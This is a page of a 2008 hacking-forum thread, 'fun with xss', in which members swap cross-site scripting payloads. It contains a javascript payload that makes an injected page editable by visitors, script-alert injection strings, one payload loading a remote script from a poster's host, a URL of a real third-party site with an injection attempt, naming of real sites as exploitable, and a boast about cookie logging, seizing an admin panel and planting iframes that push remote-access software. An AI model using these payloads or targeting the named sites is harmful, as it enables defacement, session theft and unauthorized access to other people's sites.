Follow us on Twitter!
Your life is ending one minute at a time. If you were to die tomorrow, what would you do today?
Wednesday, April 23, 2014
Navigation
Home
HellBoundHackers Main:
HellBoundHackers Find:
HellBoundHackers Information:
Learn
Communicate
Submit
Shop
Challenges
HellBoundHackers Exploit:
HellBoundHackers Programming:
HellBoundHackers Think:
HellBoundHackers Track:
HellBoundHackers Patch:
HellBoundHackers Other:
HellBoundHackers Need Help?
Other
Members Online
Total Online: 25
Guests Online: 19
Members Online: 6

Registered Members: 82885
Newest Member: ConiBE
Latest Articles
View Thread

HellBound Hackers | Computer General | Web hacking

Page 1 of 2 1 2 >
Author

fun with xss


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 20-09-08 03:03
Here is a little fun you can have with xss. You can use javascript code:
javascript: document.body.contentEditable ='true'; document.designMode='on'; void 0 (take out the space between javascript: documnet *damn smileys)

inside your xss statement. Anyone who visits the page you just xss'ed can now edit the page to there liking. *I know this is old code, and i know that lots of people know about it, but i have never heard of anyone injecting it into an xss attack. (have fun)




Edited by on 20-09-08 03:24
Author

RE: fun with xss

yours31f
Member



Posts: 1678
Location: Dallas Texas
Joined: 27.04.07
Rank:
Elite
Posted on 29-09-08 20:28
This is a pretty good idea.

anyways I was doing some xss testing and came across this...

http://www.estellegetty.com/fan_list/page.php?action=%3Cscript%3Ealert(%22yours31f%22);%3C/script%3E


I thought it was pretty funny.


Debugging is what programmers do to beta software to make it take up more room on your hard drive if it is running too efficiently.


img259.imageshack.us/img259/3713/sigr.png

yours31f@live.com yours31f@yahoo.com rpwd.info
Author

RE: fun with xss

rex_mundi
☆ Lucifer ☆



Posts: 1459
Location: Scotland
Joined: 20.02.08
Rank:
God
Posted on 29-09-08 20:42
Is this your mums site? :right:


U N Ⓡⓔⓧ_Ⓜⓤⓝⓓⓘ
Author

RE: fun with xss

yours31f
Member



Posts: 1678
Location: Dallas Texas
Joined: 27.04.07
Rank:
Elite
Posted on 29-09-08 20:48
nope. One of my friends ask me to help him see if it was secure. (i didn't do much btw si i don't know if it has any holes.)


Debugging is what programmers do to beta software to make it take up more room on your hard drive if it is running too efficiently.


img259.imageshack.us/img259/3713/sigr.png

yours31f@live.com yours31f@yahoo.com rpwd.info
Author

RE: fun with xss

rex_mundi
☆ Lucifer ☆



Posts: 1459
Location: Scotland
Joined: 20.02.08
Rank:
God
Posted on 29-09-08 20:53
Trying to deface a dead pensioners site man , tut tut.


U N Ⓡⓔⓧ_Ⓜⓤⓝⓓⓘ
Author

RE: fun with xss

yours31f
Member



Posts: 1678
Location: Dallas Texas
Joined: 27.04.07
Rank:
Elite
Posted on 29-09-08 20:59
nope, I was just helping to secure it. I was ask for help, and it will be fixed tomorrow.


Debugging is what programmers do to beta software to make it take up more room on your hard drive if it is running too efficiently.


img259.imageshack.us/img259/3713/sigr.png

yours31f@live.com yours31f@yahoo.com rpwd.info
Author

RE: fun with xss


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 29-09-08 22:45
Best fun ive ever had with XSS was iFrames.
The XSS allowed me to chuck a cookie logger on the page.
Then once I had admin cPanel I chucked iFrames all over it : ]
If a site already has some activex on it then your in luck.
Create an iFrame linking to you logmein vpn install software page.
Then upon visiting a vnc is installed for you.
Wow wasnt that easy.
Ill draw up some code for it today.
I got work at computer help now :ninja:




Edited by on 29-09-08 22:55
Author

RE: fun with xss

yours31f
Member



Posts: 1678
Location: Dallas Texas
Joined: 27.04.07
Rank:
Elite
Posted on 29-09-08 23:31
right now im just doing this
Code

"> <script>alert("xssed");</script>

"</textarea> <script>alert("xssed");</script>

"><script src="http://yours31f.ulmb.com/xss.html"></script>







Debugging is what programmers do to beta software to make it take up more room on your hard drive if it is running too efficiently.


img259.imageshack.us/img259/3713/sigr.png



Edited by yours31f on 29-09-08 23:32
yours31f@live.com yours31f@yahoo.com rpwd.info
Author

RE: fun with xss


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 29-09-08 23:59
yours3lf, if you're talking about xssing the site you just posted, I don't think that is going to work (at least from ?page.php=xsshere). It looks like they are using switch case and the default case displays that error page. Good luck though
Edit: i lied about the switch case. That is the default error message, but you still won't be able to xss it since it wont return the values back onto the page.

Edited by on 30-09-08 00:02
Author

RE: fun with xss

rex_mundi
☆ Lucifer ☆



Posts: 1459
Location: Scotland
Joined: 20.02.08
Rank:
God
Posted on 30-09-08 00:07
Dude , don't encourage him.


U N Ⓡⓔⓧ_Ⓜⓤⓝⓓⓘ
Author

RE: fun with xss

fashizzlepop
Member



Posts: 482
Location: Old folks home.
Joined: 08.04.08
Rank:
Moderate
Posted on 30-09-08 00:10
lol


"The definition of insanity is doing the same thing over and over again and expecting different results.
~Albert Einstein~


csullivan.codeinspire.net/images/boomsig2.png
fashizzlepop@gmail.com http://csullivan.codeinspire.net/
Author

RE: fun with xss

rex_mundi
☆ Lucifer ☆



Posts: 1459
Location: Scotland
Joined: 20.02.08
Rank:
God
Posted on 30-09-08 00:11
You know its true Pfft


U N Ⓡⓔⓧ_Ⓜⓤⓝⓓⓘ
Author

RE: fun with xss


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 30-09-08 00:32
yours31f wrote:
right now im just doing this
Code

"> <script>alert("xssed");</script>

"</textarea> <script>alert("xssed");</script>

"><script src="http://yours31f.ulmb.com/xss.html"></script>





Go back to the cheat sheet and get some more ideas.




Edited by on 30-09-08 04:18
Author

RE: fun with xss


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 30-09-08 03:08
Most of the sites hosted by the Russian Information Network are pretty exploitable to XSS. There are quite a few of them, and even search.rin.ru, their main search engine, is exploitable. This is good for experimentally learning more about the exploit and how it can used for things other than creating alert boxes and stealing cookies. XSS is a powerful exploit that is often misused, attempt not to add on to the misuse.
Author

RE: fun with xss


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 30-09-08 03:16
Frown
You shouldn't put URLs if you're going to tell the community
that they're vulnerable to some sort of attack...


Author

RE: fun with xss


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 30-09-08 03:35
Technically, I didn't post the URL. I only posted the host, which is one of many parts of a full URL. Despite this, I do understand what you are trying to say and I'll be more careful next time. Grin
Author

RE: fun with xss

yours31f
Member



Posts: 1678
Location: Dallas Texas
Joined: 27.04.07
Rank:
Elite
Posted on 30-09-08 03:39
and the one I posted (as far as I know) is not.


Debugging is what programmers do to beta software to make it take up more room on your hard drive if it is running too efficiently.


img259.imageshack.us/img259/3713/sigr.png

yours31f@live.com yours31f@yahoo.com rpwd.info
Author

RE: fun with xss


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 30-09-08 03:53
Well you must not know much, because what you posted is a full fledged URL. Your last post was both pointless and incorrect. Make use of the time you spend writing pointless posts and read.

http://www.mattcu. . .finitions/

Seriously, if only you'd use Google more often, you wouldn't be flamed as often.

Edited by on 30-09-08 03:54
Author

RE: fun with xss


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 30-09-08 04:02
HZ wrote:
Well you must not know much, because what you posted is a full fledged URL. Your last post was both pointless and incorrect. Make use of the time you spend writing pointless posts and read.

http://www.mattcu. . .finitions/

Seriously, if only you'd use Google more often, you wouldn't be flamed as often.


I think he was speaking of the fact that the URL he posted
wasn't vulnerable.

Please, as a (new) member of this community, don't be so
quick to flame other members of the community


Author

RE: fun with xss

yours31f
Member



Posts: 1678
Location: Dallas Texas
Joined: 27.04.07
Rank:
Elite
Posted on 30-09-08 04:07
thats exactly what i was saying.


Debugging is what programmers do to beta software to make it take up more room on your hard drive if it is running too efficiently.


img259.imageshack.us/img259/3713/sigr.png

yours31f@live.com yours31f@yahoo.com rpwd.info
Page 1 of 2 1 2 >